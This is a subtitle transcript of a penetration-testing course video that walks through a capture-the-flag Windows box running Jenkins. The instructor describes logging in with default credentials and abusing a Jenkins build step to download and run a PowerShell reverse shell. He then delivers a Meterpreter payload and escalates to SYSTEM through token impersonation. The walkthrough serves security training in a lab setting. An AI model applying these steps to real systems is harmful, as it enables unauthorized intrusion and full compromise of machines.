1
00:00:00,210 --> 00:00:03,460
Here we are with our old friend Jenkins.

2
00:00:03,540 --> 00:00:08,220
If you looked at the logo, you kind of understood what you were getting yourself into.

3
00:00:08,220 --> 00:00:14,790
Now this exploit is going to feel a little familiar because of Jenkins, but there are paths that we have

4
00:00:14,790 --> 00:00:19,380
not taken in this course, and a little bit of modification to how we actually get there.

5
00:00:19,980 --> 00:00:28,470
So I'm curious to see how you performed. Now this exploit itself does require a little bit of Metasploit,

6
00:00:28,980 --> 00:00:32,340
and that's OK, so we're going to use it mostly here.

7
00:00:32,790 --> 00:00:38,340
But what we're gonna do is we're going to get a low-level shell, we'll escalate that shell up, and then

8
00:00:38,340 --> 00:00:42,060
we're going to perform our escalation completely.

9
00:00:42,090 --> 00:00:49,460
So let's go ahead and take a look at the scan. Now the scan has port 80 open, 3389, and 8080.

10
00:00:49,530 --> 00:00:59,910
So go ahead and just go to those web pages. So what we'll do is we'll go to port 80 and we'll go to port

11
00:00:59,910 --> 00:01:09,960
8080, and you could see that we have good old Bruce Wayne here and alfred@wayneenterprises.com.

12
00:01:09,990 --> 00:01:15,030
So we've got perhaps a username, perhaps a couple of usernames, depending on how Capture the Flag

13
00:01:15,060 --> 00:01:16,680
this box really is.

14
00:01:16,770 --> 00:01:18,480
And then we've got this admin portal.

15
00:01:18,570 --> 00:01:24,960
So if we can't log in here, then what we're gonna need to do is examine this further. Maybe we'll do some

16
00:01:24,960 --> 00:01:29,080
sort of directory busting or look at the source code, see where we need to go.

17
00:01:29,220 --> 00:01:33,480
We can gather information here to perhaps see the login is Alfred.

18
00:01:33,480 --> 00:01:35,790
Perhaps it's Bruce, perhaps it's this email.

19
00:01:36,180 --> 00:01:40,750
So any sort of brute forcing that we might perform on this page,

20
00:01:40,950 --> 00:01:41,880
it's possible.

21
00:01:41,880 --> 00:01:47,700
However, it's always worth just trying admin:admin and seeing where that gets you in life, because you would

22
00:01:47,700 --> 00:01:48,950
be very surprised.

23
00:01:48,960 --> 00:01:55,260
I've seen this on bug bounties before, where you just go and you type admin/admin on a page and it loads

24
00:01:55,260 --> 00:01:56,170
right up.

25
00:01:56,280 --> 00:01:58,080
So that's easy, right?

26
00:01:58,470 --> 00:02:06,860
Now we're in here and we have the opportunity to look around just like we did before. So we have this

27
00:02:06,860 --> 00:02:13,250
build history, we've got Manage Jenkins, we could look at different parts of this.

28
00:02:13,250 --> 00:02:19,310
Remember last time we came in here we were able to do the Groovy shell with the Jenkins CLI, or the script

29
00:02:19,310 --> 00:02:25,250
console, and see if we can get a shell. Now we could try this one if we want, but there was a suggested

30
00:02:25,250 --> 00:02:33,080
path. Otherwise, if we come into Alfred and we scroll down a little bit, you'll see that there is a suggested

31
00:02:33,080 --> 00:02:38,420
path of using PowerShell in here, maybe as initial access.

32
00:02:38,420 --> 00:02:43,820
It says you should use PowerShell, so it says use PowerShell to get this.

33
00:02:43,820 --> 00:02:45,510
Now how are we going to do that?

34
00:02:45,560 --> 00:02:56,590
Well, if we go into build history and we look at project, we could take a look at the job, project, and

35
00:02:56,590 --> 00:03:06,770
then we could go over to configure. So if we scroll through configure, take a look at what we can do, we

36
00:03:06,770 --> 00:03:11,630
can run a command here. Look, you can see execute Windows batch command.

37
00:03:12,500 --> 00:03:15,230
And here we've got whoami.

38
00:03:15,230 --> 00:03:16,460
But why do we have to run

39
00:03:16,460 --> 00:03:16,960
whoami?

40
00:03:16,960 --> 00:03:19,700
Why can't we run a reverse shell?

41
00:03:19,700 --> 00:03:20,720
So we'll cheat a little bit.

42
00:03:20,720 --> 00:03:25,200
We'll just copy this and we're going to paste it into here.

43
00:03:25,310 --> 00:03:30,870
Now we need Invoke-PowerShellTcp

44
00:03:30,950 --> 00:03:33,350
.ps1. What is this? Well, we'll go take a look.

45
00:03:33,350 --> 00:03:39,110
This is Nishang. If you've never seen this thing, this is a very popular reverse shell. Go out to

46
00:03:39,110 --> 00:03:44,580
Google and just put that in here, and you'll see the Nishang Invoke-PowerShellTcp.ps1.

47
00:03:44,690 --> 00:03:51,110
So we'll just go ahead and grab this, the raw version, copy it, and then we'll open a new folder and we'll

48
00:03:51,110 --> 00:03:59,320
just put this in and transfer, and we will gedit this really quick. We'll call it what it is, which is

49
00:03:59,320 --> 00:04:09,170
Invoke-PowerShellTcp.ps1, and paste in here and save.

50
00:04:09,320 --> 00:04:10,200
All right.

51
00:04:10,280 --> 00:04:14,450
So now what we need to do is we need to say OK.

52
00:04:14,480 --> 00:04:17,210
So we have our IP, which I don't actually know, my IP.

53
00:04:17,220 --> 00:04:22,620
Let's grab our IP: 10.11.4.114.

54
00:04:22,650 --> 00:04:30,320
So go ahead and do 10.11.4.114 on port 80.

55
00:04:30,480 --> 00:04:37,520
We're grabbing this, then we need to do a reverse to our IP address and then the port.

56
00:04:37,520 --> 00:04:42,180
So let's do a reverse of 10.11.4.114.

57
00:04:42,440 --> 00:04:50,120
Our port, we could just do something like 443, would be fine, and now let's go ahead and run

58
00:04:50,180 --> 00:04:52,180
netcat on this.

59
00:04:52,250 --> 00:05:03,820
So say netcat and -lvp on 443, and we'll go ahead and save this. Let's make sure that we also have

60
00:05:03,880 --> 00:05:05,740
our Python running.

61
00:05:05,770 --> 00:05:14,950
Let's open up a new tab here and we're just going to say python -m SimpleHTTPServer on 80,

62
00:05:15,910 --> 00:05:23,210
and then we're gonna go ahead and just say build now, and it should go out and grab this from port 80.

63
00:05:23,210 --> 00:05:25,070
You could see the grab happen.

64
00:05:25,130 --> 00:05:26,270
It should execute.

65
00:05:26,270 --> 00:05:27,650
And here we are.

66
00:05:27,650 --> 00:05:34,760
So now we say whoami, and we are alfred\bruce. Perfect.

67
00:05:34,990 --> 00:05:41,210
So if we do a little bit of enumeration, we can do a systeminfo, see where we're at.

68
00:05:41,230 --> 00:05:48,620
2015, looks relatively newer. Doesn't mean that there's not exploits here available to us, but you could

69
00:05:48,620 --> 00:06:00,570
see that we are running on Windows 7 Ultimate Service Pack 1, build 7601, and we can do some basic commands,

70
00:06:00,590 --> 00:06:09,240
so whoami, and we can look at the privs, which is important. So we look at the privs.

71
00:06:09,260 --> 00:06:10,720
A lot of them are disabled.

72
00:06:10,730 --> 00:06:19,980
But let's look at what's enabled: SeDebug is enabled, SeChangeNotify, SeImpersonate is enabled, and SeCreateGlobal

73
00:06:19,990 --> 00:06:21,630
privilege.

74
00:06:21,640 --> 00:06:29,170
So what I want to do is I want to look at the impersonate. Now, not saying this is the first path you

75
00:06:29,170 --> 00:06:29,830
should've taken.

76
00:06:29,830 --> 00:06:33,180
This is the path that we're taking forward for the video itself.

77
00:06:33,430 --> 00:06:36,820
You should have run all of your checks.

78
00:06:36,940 --> 00:06:43,420
You should have run your PowerUp or your Sherlock or Windows Exploit Suggester or winPEAS. However

79
00:06:43,420 --> 00:06:46,690
you wanted to approach this was absolutely the correct way.

80
00:06:46,690 --> 00:06:49,300
I'm just moving forward just to save time.

81
00:06:49,510 --> 00:06:56,710
Now eventually what it boils down to is this impersonate token, and what we're gonna do is we're gonna

82
00:06:56,770 --> 00:07:03,940
elevate to a Meterpreter shell, and with that Meterpreter shell we're gonna go ahead and pull up

83
00:07:04,990 --> 00:07:12,280
incognito and see where we can get with that. So let's go ahead and go to a Meterpreter shell. So

84
00:07:12,280 --> 00:07:18,490
quickly, what we're gonna do is we're gonna close out of here and we're just gonna say msfvenom, we'll

85
00:07:18,490 --> 00:07:20,920
do a payload of windows/meterpreter

86
00:07:23,290 --> 00:07:29,510
and we find the architecture on the system, x64-based.

87
00:07:29,510 --> 00:07:42,840
So we're gonna need 64-bit architecture. We'll do reverse_tcp and we'll add in the 64-bit.

88
00:07:42,920 --> 00:07:43,390
All right.

89
00:07:43,400 --> 00:07:57,140
And then we'll say LHOST equals 10.11.4.114, LPORT equals, and we'll say 7777,

90
00:07:57,140 --> 00:08:07,990
file type is executable, and then we'll just put this into a shell. We'll call it shell.exe, you

91
00:08:08,060 --> 00:08:12,200
see, just because I don't know if I have a shell in here. I guess it really doesn't matter, but I'll write

92
00:08:12,200 --> 00:08:20,840
this out, and then we're gonna go ahead and certutil this on over if we can, or we can do a PowerShell

93
00:08:20,840 --> 00:08:25,550
to grab. So we can try a different technique if you want to grab with PowerShell.

94
00:08:25,910 --> 00:08:29,150
So what we'll do here is first let's go ahead and

95
00:08:33,150 --> 00:08:36,110
start up msfvenom, or msfconsole.

96
00:08:36,160 --> 00:08:38,940
We're gonna need to catch the shell with our multi handler,

97
00:08:42,720 --> 00:08:45,150
so we can say use multi/handler

98
00:08:47,840 --> 00:08:52,870
and then we're just gonna say set payload windows/x64/

99
00:08:52,910 --> 00:08:59,410
meterpreter/reverse_tcp, set

100
00:08:59,510 --> 00:09:03,320
LHOST to 10.11.4.114.

101
00:09:03,470 --> 00:09:08,440
Set our LPORT to all sevens, and that should be good to run.

102
00:09:08,450 --> 00:09:10,690
Let's check the options.

103
00:09:10,730 --> 00:09:12,200
Looks good to me.

104
00:09:12,250 --> 00:09:16,850
I'm going to run that now. With our shell here,

105
00:09:16,850 --> 00:09:23,780
we're in a PowerShell shell, so we can quickly run some sort of PowerShell, and I'm going to show you

106
00:09:23,780 --> 00:09:26,040
an example really quick.

107
00:09:26,090 --> 00:09:32,930
OK, so what we're gonna do is we're gonna go ahead and try to paste this in, and it's just a basic PowerShell

108
00:09:32,980 --> 00:09:38,430
command that says hey, I want you to download this file off of this server, and then I want you to save it

109
00:09:38,460 --> 00:09:40,090
as shell.exe.

110
00:09:40,140 --> 00:09:42,690
Now what I'm gonna do is make sure that we are hosting this.

111
00:09:42,750 --> 00:09:49,440
So let's go back and host this file and I'm going to run this command here.

112
00:09:49,510 --> 00:09:54,570
Now you can find this command just by downloading, or just by searching a basic download command.

113
00:09:55,180 --> 00:10:00,820
And then once we download it, all we have to do is do a Start-Process. So we say Start-Process and then we'll

114
00:10:00,860 --> 00:10:06,350
say shell.exe at this point, sorry.

115
00:10:06,990 --> 00:10:07,990
We'll see if we pop a shell.

116
00:10:13,550 --> 00:10:15,700
getuid, alfred\bruce.

117
00:10:15,710 --> 00:10:19,180
So we have successfully brought the shell over.

118
00:10:19,250 --> 00:10:24,380
So if this doesn't work for you for some reason, you can also use web delivery and generate a PowerShell

119
00:10:24,410 --> 00:10:26,660
exploit, which may even be easier.

120
00:10:26,750 --> 00:10:27,840
But here we are.

121
00:10:27,860 --> 00:10:28,940
We're good.

122
00:10:28,940 --> 00:10:33,860
Now let's go ahead and load up incognito, and we could do getprivs here as well.

123
00:10:33,860 --> 00:10:39,610
Don't forget about getprivs, and you can see that we do have the impersonate available to us.

124
00:10:40,210 --> 00:10:47,390
So with incognito, let's go ahead and list the tokens, and you could see that we have a few different

125
00:10:47,390 --> 00:10:49,650
tokens available to us.

126
00:10:49,670 --> 00:10:52,040
One is the NT AUTHORITY\SYSTEM.

127
00:10:52,400 --> 00:10:59,400
So all I'm going to do is just copy the NT AUTHORITY\SYSTEM and try to elevate into that. So let's copy

128
00:10:59,400 --> 00:11:07,730
that, and let's just say impersonate_token, and we'll paste this and see if it works. OK.

129
00:11:07,740 --> 00:11:12,120
And now we'll say getuid, and now NT AUTHORITY\SYSTEM.

130
00:11:12,220 --> 00:11:17,370
If we drop into a shell, see if it works. OK, so we have an issue creating a shell here.

131
00:11:18,300 --> 00:11:21,590
So let's do a quick ps and look at what's going on.

132
00:11:21,660 --> 00:11:25,550
It could be that the shell that we're on is not working for us.

133
00:11:26,370 --> 00:11:30,300
So let's try to migrate off of what we're on right now into a different service.

134
00:11:30,300 --> 00:11:35,710
So let's go ahead and just say migrate 3032 and see if that works for us.

135
00:11:35,730 --> 00:11:39,160
Unfortunately, that failed, and that does happen sometimes.

136
00:11:39,180 --> 00:11:44,990
So let's go ahead and rerun this, and it should be straightforward, and we'll just have to find another

137
00:11:44,990 --> 00:11:46,390
process to run into,

138
00:11:52,140 --> 00:11:55,100
and I'm going to hunt down the svchosts.

139
00:11:55,110 --> 00:12:01,590
So we're going to try to go into anything that's running as NT AUTHORITY\SYSTEM. The next one that I see

140
00:12:01,590 --> 00:12:04,110
as svchost is 1736.

141
00:12:04,110 --> 00:12:07,340
So we can try to migrate into that.

142
00:12:07,930 --> 00:12:08,880
See if that works

143
00:12:13,430 --> 00:12:19,100
and now it completed successfully. getuid, let's see if we are. Try typing shell, and now we have

144
00:12:19,100 --> 00:12:19,910
a shell.

145
00:12:20,090 --> 00:12:21,200
whoami.

146
00:12:21,200 --> 00:12:22,380
NT AUTHORITY\SYSTEM.

147
00:12:22,550 --> 00:12:27,790
So let's retrace that really quick just to make sure we're on the same page.

148
00:12:27,980 --> 00:12:35,210
Sometimes when we have a shell, even though we are showing as NT AUTHORITY\SYSTEM, we're not fully on the

149
00:12:35,210 --> 00:12:36,380
NT AUTHORITY\SYSTEM.

150
00:12:36,380 --> 00:12:40,580
If we type in shell and we can't drop into the channel, we're having some issues.

151
00:12:40,580 --> 00:12:46,530
So we have limited commands. Because of that, we need to migrate off of what we're at.

152
00:12:47,430 --> 00:12:48,180
So we were on,

153
00:12:48,180 --> 00:12:56,490
originally, this 2816, this shell, and we're on the shell even though we elevated as Bruce. So we elevated

154
00:12:56,490 --> 00:12:58,440
from Bruce to NT AUTHORITY\SYSTEM.

155
00:12:58,590 --> 00:13:00,840
We're still stuck here on this shell.

156
00:13:01,170 --> 00:13:03,420
So we're still kind of in this weird place.

157
00:13:03,420 --> 00:13:05,430
We need to move off of this.

158
00:13:05,430 --> 00:13:10,530
So I was looking for different svchosts, because they're pretty reliable, that are running as NT AUTHORITY\

159
00:13:10,530 --> 00:13:13,770
SYSTEM, because that's who we are, who we want to be.

160
00:13:14,010 --> 00:13:20,580
And we were able to migrate into 1736. So it's patience with migration. Sometimes it works, sometimes

161
00:13:20,580 --> 00:13:21,420
it doesn't.

162
00:13:21,420 --> 00:13:24,060
Here we are, we got it to work and we elevated.

163
00:13:24,060 --> 00:13:27,600
So let's take this and think about it really quick.

164
00:13:27,600 --> 00:13:34,790
We have gone through yet another type of Jeeves exploit, or Jenkins exploit.

165
00:13:34,800 --> 00:13:35,100
Right?

166
00:13:35,100 --> 00:13:41,360
We did Jeeves, and now we've done this Jenkins slash Alfred box, and it was a different path.

167
00:13:41,370 --> 00:13:45,930
Just a little bit different path, but something that you should have gotten, something that you've seen

168
00:13:45,930 --> 00:13:46,470
before.

169
00:13:46,470 --> 00:13:51,330
And then when we got to this potato, or not potato, when we got to this impersonation exploit.

170
00:13:51,330 --> 00:13:58,410
Not all potatoes. When we got to this incognito exploit, which is again very, very possible from a real

171
00:13:58,410 --> 00:13:59,250
world perspective.

172
00:13:59,250 --> 00:14:00,330
I love incognito.

173
00:14:00,330 --> 00:14:07,290
It's a great tool, it comes up on interviews, so it's definitely important to know. We came across SeImpersonate

174
00:14:07,290 --> 00:14:12,870
and we were able to utilize it to move into another user, so that delegate token was available to

175
00:14:12,870 --> 00:14:18,480
us. We migrated into that delegate token, or impersonated that delegate token, and then we were able

176
00:14:18,480 --> 00:14:26,220
to migrate into a different PID and successfully captured NT AUTHORITY\SYSTEM.

177
00:14:26,220 --> 00:14:33,520
So we are done with three boxes now. We've got two left to go, so from here we're gonna go ahead and take

178
00:14:33,520 --> 00:14:35,890
on Bastion from Hack The Box.

179
00:14:35,890 --> 00:14:41,050
So it's getting a little bit harder, but we're almost through this capstone, so I'll catch you over as

180
00:14:41,050 --> 00:14:43,090
we walk through Bastion in the next video.
